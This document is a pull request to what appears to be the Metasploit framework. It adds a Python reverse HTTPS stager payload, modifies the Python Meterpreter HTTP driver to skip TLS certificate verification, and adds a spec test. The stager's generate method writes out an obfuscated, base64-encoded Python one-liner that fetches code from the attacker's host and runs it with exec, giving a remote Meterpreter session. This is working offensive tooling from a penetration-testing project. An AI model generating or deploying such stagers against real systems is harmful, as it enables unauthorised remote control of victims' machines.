### PR TITLE
Python reverse HTTPS stager

### DIFF
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -393,12 +393,17 @@ class PythonMeterpreter(object):
 			print(msg)
 
 	def driver_init_http(self):
+		opener_args = []
+		scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+			import ssl
+			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+			ssl_ctx.check_hostname=False
+			ssl_ctx.verify_mode=ssl.CERT_NONE
+			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 		if HTTP_PROXY:
-			scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
-			proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY})
-			opener = urllib.build_opener(proxy_handler)
-		else:
-			opener = urllib.build_opener()
+			opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
+		opener = urllib.build_opener(*opener_args)
 		if HTTP_USER_AGENT:
 			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 		urllib.install_opener(opener)

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -264,7 +264,7 @@ def tlv_pack(*args):
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:
 		value = tlv['value']
-		if sys.version_info[0] < 3 and isinstance(value, __builtins__['unicode']):
+		if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
 			value = value.encode('UTF-8')
 		elif not is_bytes(value):
 			value = bytes(value, 'UTF-8')
@@ -394,7 +394,8 @@ class PythonMeterpreter(object):
 
 	def driver_init_http(self):
 		if HTTP_PROXY:
-			proxy_handler = urllib.ProxyHandler({'http': HTTP_PROXY})
+			scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+			proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY})
 			opener = urllib.build_opener(proxy_handler)
 		else:
 			opener = urllib.build_opener()

--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+  CachedSize = 448
+
+  include Msf::Payload::Stager
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse HTTPS Stager',
+      'Description'   => 'Tunnel communication over HTTP using SSL',
+      'Author'        => 'Spencer McIntyre',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseHttps,
+      'Stager'        => {'Payload' => ""}
+    ))
+
+    register_options(
+      [
+        OptString.new('PayloadProxyHost', [false, "The proxy server's IP address"]),
+        OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ])
+      ], self.class)
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    lhost = datastore['LHOST'] || '127.127.127.127'
+
+    var_escape = lambda { |txt|
+      txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
+    }
+
+    if Rex::Socket.is_ipv6?(lhost)
+      target_url = "https://[#{lhost}]"
+    else
+      target_url = "https://#{lhost}"
+    end
+
+    target_url << ':'
+    target_url << datastore['LPORT'].to_s
+    target_url << '/'
+    target_url << generate_callback_uri
+
+    proxy_host = datastore['PayloadProxyHost'].to_s
+    proxy_port = datastore['PayloadProxyPort'].to_i
+
+    cmd  = "import sys\n"
+    if proxy_host == ''
+      cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
+    else
+      proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
+        "http://[#{proxy_host}]:#{proxy_port}" :
+        "http://#{proxy_host}:#{proxy_port}"
+
+      cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
+      cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
+    end
+
+    cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
+    cmd << "exec(o.open('#{target_url}').read())\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
+
+    # Make room for the maximum possible URL length
+    space += 256
+
+    # The final estimated size
+    space
+  end
+
+  #
+  # Return the longest URL that fits into our available space
+  #
+  def generate_callback_uri
+    uri_req_len = 30 + rand(256-30)
+
+    # Generate the short default URL if we don't have enough space
+    if self.available_space.nil? || required_space > self.available_space
+      uri_req_len = 5
+    end
+
+    generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
+  end
+
+end

--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https'
 
 module Metasploit3
 
-  CachedSize = 448
+  CachedSize = 446
 
   include Msf::Payload::Stager
 

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2045,6 +2045,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'python/meterpreter/reverse_http'
   end
 
+  context 'python/meterpreter/reverse_https' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'stagers/python/reverse_https',
+                            'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_https'
+  end
+
   context 'python/meterpreter/reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This adds a reverse HTTPS stager for Python to complement the existing HTTP one. Payload specs have been updated with the new stager.

This also addresses a small issue with the unicode type check. It looks like `__builtins__` is a dictionary when using the HTTP / HTTPS stagers, this works around that with a more strict check.

Tested on:
- Linux 2.5.1
- Linux 2.7.8
- Linux 2.7.9
- Linux 3.1.3
- Linux 3.4.1
- Linux 3.4.3
- Windows 2.7
- Windows 3.4

Testing Steps:
- [x] Make sure Travis is Green (the new payloads_spec.rb is ok)
- [x] Get a responsive session over HTTPS
- [x] Get a responsive session over HTTPS with a proxy
